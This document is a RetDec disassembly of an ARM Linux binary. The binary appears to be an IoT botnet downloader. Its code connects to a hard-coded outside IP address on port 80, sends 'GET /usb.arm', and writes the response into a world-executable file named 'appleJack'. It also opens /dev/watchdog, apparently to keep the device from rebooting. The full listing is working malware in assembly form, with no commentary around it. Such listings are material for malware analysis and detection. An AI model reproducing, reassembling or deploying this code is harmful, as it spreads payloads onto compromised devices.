;;
;; This file was generated by the Retargetable Decompiler
;; Website: https://retdec.com
;; Copyright (c) 2018 Retargetable Decompiler <info@retdec.com>
;;
;; Decompilation date: 2018-03-24 22:56:34
;; Architecture: arm
;;

;;
;; Code Segment
;;

; section: .text
; function: function_8074 at 0x8074 -- 0x80b3
0x8074:    01 18 a0 e1   	lsl r1, r1, #0x10
0x8078:    ff 18 01 e2   	and r1, r1, #0xff0000
0x807c:    00 1c 81 e1   	orr r1, r1, r0, lsl #24
0x8080:    ff 30 03 e2   	and r3, r3, #0xff
0x8084:    02 24 a0 e1   	lsl r2, r2, #8
0x8088:    03 10 81 e1   	orr r1, r1, r3
0x808c:    ff 2c 02 e2   	and r2, r2, #0xff00
0x8090:    01 20 82 e1   	orr r2, r2, r1
0x8094:    ff 3c 02 e2   	and r3, r2, #0xff00
0x8098:    ff 08 02 e2   	and r0, r2, #0xff0000
0x809c:    03 34 a0 e1   	lsl r3, r3, #8
0x80a0:    20 04 a0 e1   	lsr r0, r0, #8
0x80a4:    22 0c 80 e1   	orr r0, r0, r2, lsr #24
0x80a8:    02 3c 83 e1   	orr r3, r3, r2, lsl #24
0x80ac:    00 00 83 e1   	orr r0, r3, r0
0x80b0:    0e f0 a0 e1   	mov pc, lr
; function: function_80b4 at 0x80b4 -- 0x80c3
0x80b4:    00 10 a0 e1   	mov r1, r0
0x80b8:    00 00 9f e5   	ldr r0, [pc]
0x80bc:    b6 00 00 ea   	b #0x839c <function_839c>
0x80c0:    01 00 90 00   	addseq r0, r0, r1
; function: function_80c4 at 0x80c4 -- 0x80d3
0x80c4:    00 10 a0 e1   	mov r1, r0
0x80c8:    00 00 9f e5   	ldr r0, [pc]
0x80cc:    b2 00 00 ea   	b #0x839c <function_839c>
0x80d0:    06 00 90 00   	addseq r0, r0, r6
; function: function_80d4 at 0x80d4 -- 0x80ef
0x80d4:    01 c0 a0 e1   	mov ip, r1
0x80d8:    00 10 a0 e1   	mov r1, r0
0x80dc:    08 00 9f e5   	ldr r0, [pc, #8]
0x80e0:    02 30 a0 e1   	mov r3, r2
0x80e4:    0c 20 a0 e1   	mov r2, ip
0x80e8:    ab 00 00 ea   	b #0x839c <function_839c>
0x80ec:    05 00 90 00   	addseq r0, r0, r5
; function: function_80f0 at 0x80f0 -- 0x8117
0x80f0:    04 e0 2d e5   	str lr, [sp, #-4]!
0x80f4:    0c d0 4d e2   	sub sp, sp, #0xc
0x80f8:    07 00 8d e8   	stm sp, {r0, r1, r2}
0x80fc:    03 10 a0 e3   	mov r1, #3
0x8100:    0d 20 a0 e1   	mov r2, sp
0x8104:    08 00 9f e5   	ldr r0, [pc, #8]
0x8108:    a3 00 00 eb   	bl #0x839c <function_839c>
0x810c:    0c d0 8d e2   	add sp, sp, #0xc
0x8110:    00 80 bd e8   	ldm sp!, {pc}
0x8114:    66 00 90 00   	addseq r0, r0, r6, rrx
; function: function_8118 at 0x8118 -- 0x8133
0x8118:    01 c0 a0 e1   	mov ip, r1
0x811c:    00 10 a0 e1   	mov r1, r0
0x8120:    08 00 9f e5   	ldr r0, [pc, #8]
0x8124:    02 30 a0 e1   	mov r3, r2
0x8128:    0c 20 a0 e1   	mov r2, ip
0x812c:    9a 00 00 ea   	b #0x839c <function_839c>
0x8130:    04 00 90 00   	addseq r0, r0, r4
; function: function_8134 at 0x8134 -- 0x814f
0x8134:    01 c0 a0 e1   	mov ip, r1
0x8138:    00 10 a0 e1   	mov r1, r0
0x813c:    08 00 9f e5   	ldr r0, [pc, #8]
0x8140:    02 30 a0 e1   	mov r3, r2
0x8144:    0c 20 a0 e1   	mov r2, ip
0x8148:    93 00 00 ea   	b #0x839c <function_839c>
0x814c:    03 00 90 00   	addseq r0, r0, r3
; function: function_8150 at 0x8150 -- 0x8177
0x8150:    04 e0 2d e5   	str lr, [sp, #-4]!
0x8154:    0c d0 4d e2   	sub sp, sp, #0xc
0x8158:    07 00 8d e8   	stm sp, {r0, r1, r2}
0x815c:    01 10 a0 e3   	mov r1, #1
0x8160:    0d 20 a0 e1   	mov r2, sp
0x8164:    08 00 9f e5   	ldr r0, [pc, #8]
0x8168:    8b 00 00 eb   	bl #0x839c <function_839c>
0x816c:    0c d0 8d e2   	add sp, sp, #0xc
0x8170:    00 80 bd e8   	ldm sp!, {pc}
0x8174:    66 00 90 00   	addseq r0, r0, r6, rrx
; function: function_8178 at 0x8178 -- 0x82ff
0x8178:    f0 41 2d e9   	push {r4, r5, r6, r7, r8, lr}
0x817c:    74 41 9f e5   	ldr r4, [pc, #0x174]
0x8180:    94 d0 4d e2   	sub sp, sp, #0x94
0x8184:    00 00 00 ea   	b #0x818c <function_8178+0x14>
0x8188:    01 40 84 e2   	add r4, r4, #1
0x818c:    00 60 d4 e5   	ldrb r6, [r4]
0x8190:    00 00 56 e3   	cmp r6, #0
0x8194:    fb ff ff 1a   	bne #0x8188 <function_8178+0x10>
0x8198:    58 31 9f e5   	ldr r3, [pc, #0x158]
0x819c:    58 11 9f e5   	ldr r1, [pc, #0x158]
0x81a0:    06 20 a0 e3   	mov r2, #6
0x81a4:    01 00 a0 e3   	mov r0, #1
0x81a8:    04 80 63 e0   	rsb r8, r3, r4
0x81ac:    d9 ff ff eb   	bl #0x8118 <function_8118>
0x81b0:    02 40 a0 e3   	mov r4, #2
0x81b4:    50 c0 a0 e3   	mov ip, #0x50
0x81b8:    39 30 a0 e3   	mov r3, #0x39
0x81bc:    a7 10 a0 e3   	mov r1, #0xa7
0x81c0:    4e 20 a0 e3   	mov r2, #0x4e
0x81c4:    b9 00 a0 e3   	mov r0, #0xb9
0x81c8:    83 c0 cd e5   	strb ip, [sp, #0x83]
0x81cc:    80 40 cd e5   	strb r4, [sp, #0x80]
0x81d0:    81 60 cd e5   	strb r6, [sp, #0x81]
0x81d4:    82 60 cd e5   	strb r6, [sp, #0x82]
0x81d8:    a5 ff ff eb   	bl #0x8074 <function_8074>
0x81dc:    1c 11 9f e5   	ldr r1, [pc, #0x11c]
0x81e0:    84 00 8d e5   	str r0, [sp, #0x84]
0x81e4:    18 21 9f e5   	ldr r2, [pc, #0x118]
0x81e8:    18 01 9f e5   	ldr r0, [pc, #0x118]
0x81ec:    b8 ff ff eb   	bl #0x80d4 <function_80d4>
0x81f0:    01 10 a0 e3   	mov r1, #1
0x81f4:    00 70 a0 e1   	mov r7, r0
0x81f8:    06 20 a0 e1   	mov r2, r6
0x81fc:    04 00 a0 e1   	mov r0, r4
0x8200:    d2 ff ff eb   	bl #0x8150 <function_8150>
0x8204:    01 00 70 e3   	cmn r0, #1
0x8208:    01 00 77 13   	cmnne r7, #1
0x820c:    00 50 a0 e1   	mov r5, r0
0x8210:    01 00 a0 03   	moveq r0, #1
0x8214:    a6 ff ff 0b   	bleq #0x80b4
0x8218:    05 00 a0 e1   	mov r0, r5
0x821c:    80 10 8d e2   	add r1, sp, #0x80
0x8220:    10 20 a0 e3   	mov r2, #0x10
0x8224:    b1 ff ff eb   	bl #0x80f0 <function_80f0>
0x8228:    00 40 50 e2   	subs r4, r0, #0
0x822c:    05 00 00 aa   	bge #0x8248 <function_8178+0xd0>
0x8230:    01 00 a0 e3   	mov r0, #1
0x8234:    d0 10 9f e5   	ldr r1, [pc, #0xd0]
0x8238:    04 20 a0 e3   	mov r2, #4
0x823c:    b5 ff ff eb   	bl #0x8118 <function_8118>
0x8240:    00 00 64 e2   	rsb r0, r4, #0
0x8244:    9a ff ff eb   	bl #0x80b4 <function_80b4>
0x8248:    1d 40 88 e2   	add r4, r8, #0x1d
0x824c:    05 00 a0 e1   	mov r0, r5
0x8250:    b8 10 9f e5   	ldr r1, [pc, #0xb8]
0x8254:    04 20 a0 e1   	mov r2, r4
0x8258:    ae ff ff eb   	bl #0x8118 <function_8118>
0x825c:    04 00 50 e1   	cmp r0, r4
0x8260:    03 00 a0 13   	movne r0, #3
0x8264:    92 ff ff 1b   	blne #0x80b4
0x8268:    06 40 a0 e1   	mov r4, r6
0x826c:    93 10 8d e2   	add r1, sp, #0x93
0x8270:    01 20 a0 e3   	mov r2, #1
0x8274:    05 00 a0 e1   	mov r0, r5
0x8278:    ad ff ff eb   	bl #0x8134 <function_8134>
0x827c:    01 00 50 e3   	cmp r0, #1
0x8280:    04 00 a0 e3   	mov r0, #4
0x8284:    8a ff ff 1b   	blne #0x80b4
0x8288:    93 30 dd e5   	ldrb r3, [sp, #0x93]
0x828c:    04 44 83 e1   	orr r4, r3, r4, lsl #8
0x8290:    7c 30 9f e5   	ldr r3, [pc, #0x7c]
0x8294:    03 00 54 e1   	cmp r4, r3
0x8298:    f3 ff ff 1a   	bne #0x826c <function_8178+0xf4>
0x829c:    0d 10 a0 e1   	mov r1, sp
0x82a0:    80 20 a0 e3   	mov r2, #0x80
0x82a4:    05 00 a0 e1   	mov r0, r5
0x82a8:    a1 ff ff eb   	bl #0x8134 <function_8134>
0x82ac:    00 20 50 e2   	subs r2, r0, #0
0x82b0:    0d 40 a0 e1   	mov r4, sp
0x82b4:    0d 10 a0 e1   	mov r1, sp
0x82b8:    07 00 a0 e1   	mov r0, r7
0x82bc:    01 00 00 da   	ble #0x82c8 <function_8178+0x150>
0x82c0:    94 ff ff eb   	bl #0x8118 <function_8118>
0x82c4:    f4 ff ff ea   	b #0x829c <function_8178+0x124>
0x82c8:    05 00 a0 e1   	mov r0, r5
0x82cc:    7c ff ff eb   	bl #0x80c4 <function_80c4>
0x82d0:    07 00 a0 e1   	mov r0, r7
0x82d4:    7a ff ff eb   	bl #0x80c4 <function_80c4>
0x82d8:    38 10 9f e5   	ldr r1, [pc, #0x38]
0x82dc:    05 20 a0 e3   	mov r2, #5
0x82e0:    01 00 a0 e3   	mov r0, #1
0x82e4:    8b ff ff eb   	bl #0x8118 <function_8118>
0x82e8:    05 00 a0 e3   	mov r0, #5
0x82ec:    70 ff ff eb   	bl #0x80b4 <function_80b4>
0x82f0:    94 d0 8d e2   	add sp, sp, #0x94
0x82f4:    f0 81 bd e8   	pop {r4, r5, r6, r7, r8, pc}
0x82f8:    94 84 00 00   	muleq r0, r4, r4
0x82fc:    98 84 00 00   	muleq r0, r8, r4
; function: function_8300 at 0x8300 -- 0x831b
0x8300:    41 02 00 00   	andeq r0, r0, r1, asr #4
0x8304:    ff 01 00 00   	strdeq r0, r1, [r0], -pc
; data inside code section at 0x8308 -- 0x831c
0x8308:    a0 84 00 00 ac 84 00 00  b4 84 00 00 0a 0d 0a 0d   |................|
0x8318:    d0 84 00 00                                        |....            |
; function: function_831c at 0x831c -- 0x838b
0x831c:    10 40 2d e9   	push {r4, lr}
0x8320:    02 10 a0 e3   	mov r1, #2
0x8324:    04 d0 4d e2   	sub sp, sp, #4
0x8328:    50 00 9f e5   	ldr r0, [pc, #0x50]
0x832c:    3a 00 00 eb   	bl #0x841c <function_841c>
0x8330:    00 40 a0 e1   	mov r4, r0
0x8334:    01 00 74 e3   	cmn r4, #1
0x8338:    02 10 a0 e3   	mov r1, #2
0x833c:    40 00 9f e5   	ldr r0, [pc, #0x40]
0x8340:    03 00 00 1a   	bne #0x8354 <function_831c+0x38>
0x8344:    34 00 00 eb   	bl #0x841c <function_841c>
0x8348:    01 00 70 e3   	cmn r0, #1
0x834c:    00 40 a0 e1   	mov r4, r0
0x8350:    08 00 00 0a   	beq #0x8378 <function_831c+0x5c>
0x8354:    04 20 8d e2   	add r2, sp, #4
0x8358:    01 30 a0 e3   	mov r3, #1
0x835c:    04 30 22 e5   	str r3, [r2, #-4]!
0x8360:    04 00 a0 e1   	mov r0, r4
0x8364:    0d 20 a0 e1   	mov r2, sp
0x8368:    18 10 9f e5   	ldr r1, [pc, #0x18]
0x836c:    16 00 00 eb   	bl #0x83cc <function_83cc>
0x8370:    04 00 a0 e1   	mov r0, r4
0x8374:    52 ff ff eb   	bl #0x80c4 <function_80c4>
0x8378:    04 d0 8d e2   	add sp, sp, #4
0x837c:    10 80 bd e8   	pop {r4, pc}
0x8380:    d8 84 00 00   	ldrdeq r8, sb, [r0], -r8
0x8384:    e8 84 00 00   	andeq r8, r0, r8, ror #9
0x8388:    04 57 04 80   	andhi r5, r4, r4, lsl #14
; function: entry_point at 0x838c -- 0x839b
0x838c:    04 e0 2d e5   	str lr, [sp, #-4]!
0x8390:    78 ff ff eb   	bl #0x8178 <function_8178>
0x8394:    04 e0 9d e4   	pop {lr}
0x8398:    df ff ff ea   	b #0x831c <function_831c>
; function: function_839c at 0x839c -- 0x83cb
0x839c:    70 40 2d e9   	push {r4, r5, r6, lr}
0x83a0:    10 40 8d e2   	add r4, sp, #0x10
0x83a4:    70 00 94 e8   	ldm r4, {r4, r5, r6}
0x83a8:    71 00 90 ef   	svc #0x900071
0x83ac:    01 0a 70 e3   	cmn r0, #0x1000
0x83b0:    00 40 a0 e1   	mov r4, r0
0x83b4:    70 80 bd 98   	popls {r4, r5, r6, pc}
0x83b8:    32 00 00 eb   	bl #0x8488 <function_8488>
0x83bc:    00 30 64 e2   	rsb r3, r4, #0
0x83c0:    00 30 80 e5   	str r3, [r0]
0x83c4:    00 00 e0 e3   	mvn r0, #0
0x83c8:    70 80 bd e8   	pop {r4, r5, r6, pc}
; function: function_83cc at 0x83cc -- 0x841b
0x83cc:    0e 00 2d e9   	push {r1, r2, r3}
0x83d0:    10 40 2d e9   	push {r4, lr}
0x83d4:    04 d0 4d e2   	sub sp, sp, #4
0x83d8:    14 30 8d e2   	add r3, sp, #0x14
0x83dc:    00 30 8d e5   	str r3, [sp]
0x83e0:    0c 10 8d e2   	add r1, sp, #0xc
0x83e4:    06 00 91 e8   	ldm r1, {r1, r2}
0x83e8:    36 00 90 ef   	svc #0x900036
0x83ec:    01 0a 70 e3   	cmn r0, #0x1000
0x83f0:    00 40 a0 e1   	mov r4, r0
0x83f4:    03 00 00 9a   	bls #0x8408 <function_83cc+0x3c>
0x83f8:    22 00 00 eb   	bl #0x8488 <function_8488>
0x83fc:    00 30 64 e2   	rsb r3, r4, #0
0x8400:    00 30 80 e5   	str r3, [r0]
0x8404:    00 40 e0 e3   	mvn r4, #0
0x8408:    04 00 a0 e1   	mov r0, r4
0x840c:    04 d0 8d e2   	add sp, sp, #4
0x8410:    10 40 bd e8   	pop {r4, lr}
0x8414:    0c d0 8d e2   	add sp, sp, #0xc
0x8418:    0e f0 a0 e1   	mov pc, lr
; function: function_841c at 0x841c -- 0x8477
0x841c:    0e 00 2d e9   	push {r1, r2, r3}
0x8420:    10 40 2d e9   	push {r4, lr}
0x8424:    04 d0 4d e2   	sub sp, sp, #4
0x8428:    0c 10 9d e5   	ldr r1, [sp, #0xc]
0x842c:    40 30 11 e2   	ands r3, r1, #0x40
0x8430:    14 30 8d 12   	addne r3, sp, #0x14
0x8434:    00 30 8d 15   	strne r3, [sp]
0x8438:    10 30 9d 15   	ldrne r3, [sp, #0x10]
0x843c:    03 28 a0 e1   	lsl r2, r3, #0x10
0x8440:    22 28 a0 e1   	lsr r2, r2, #0x10
0x8444:    05 00 90 ef   	svc #0x900005
0x8448:    01 0a 70 e3   	cmn r0, #0x1000
0x844c:    00 40 a0 e1   	mov r4, r0
0x8450:    03 00 00 9a   	bls #0x8464 <function_841c+0x48>
0x8454:    0b 00 00 eb   	bl #0x8488 <function_8488>
0x8458:    00 30 64 e2   	rsb r3, r4, #0
0x845c:    00 30 80 e5   	str r3, [r0]
0x8460:    00 40 e0 e3   	mvn r4, #0
0x8464:    04 00 a0 e1   	mov r0, r4
0x8468:    04 d0 8d e2   	add sp, sp, #4
0x846c:    10 40 bd e8   	pop {r4, lr}
0x8470:    0c d0 8d e2   	add sp, sp, #0xc
0x8474:    0e f0 a0 e1   	mov pc, lr
; function: function_8478 at 0x8478 -- 0x8487
0x8478:    01 20 a0 e1   	mov r2, r1
0x847c:    00 10 9f e5   	ldr r1, [pc]
0x8480:    e5 ff ff ea   	b #0x841c <function_841c>
0x8484:    41 02 00 00   	andeq r0, r0, r1, asr #4
; function: function_8488 at 0x8488 -- 0x8493
0x8488:    00 00 9f e5   	ldr r0, [pc]
0x848c:    0e f0 a0 e1   	mov pc, lr
0x8490:    fc 04 01 00   	strdeq r0, r1, [r1], -ip

;;
;; Data Segment
;;

; section: .rodata
0x8494:    61 72 6d 00                                        |arm.            |   "arm"
0x8498:    41 50 50 4c 45 0a 00                               |APPLE..         |   "APPLE\n"
0x849f:    00                                                 |.               |
0x84a0:    61 70 70 6c 65 4a 61 63  6b 00                     |appleJack.      |   "appleJack"
0x84aa:    00 00                                              |..              |
0x84ac:    4e 49 46 0a 00                                     |NIF..           |   "NIF\n"
0x84b1:    00 00 00                                           |...             |
0x84b4:    47 45 54 20 2f 75 73 62  2e 61 72 6d 20 48 54 54   |GET /usb.arm HTT|   "GET /usb.arm HTTP/1.0\r\n\r\n"
0x84c4:    50 2f 31 2e 30 0d 0a 0d  0a 00                     |P/1.0.....      |
0x84ce:    00 00                                              |..              |
0x84d0:    4a 41 43 4b 0a 00                                  |JACK..          |   "JACK\n"
0x84d6:    00 00                                              |..              |
0x84d8:    2f 64 65 76 2f 77 61 74  63 68 64 6f 67 00         |/dev/watchdog.  |   "/dev/watchdog"
0x84e6:    00 00                                              |..              |
0x84e8:    2f 64 65 76 2f 6d 69 73  63 2f 77 61 74 63 68 64   |/dev/misc/watchd|   "/dev/misc/watchdog"
0x84f8:    6f 67 00                                           |og.             |
0x84fb:    00                                                 |.               |
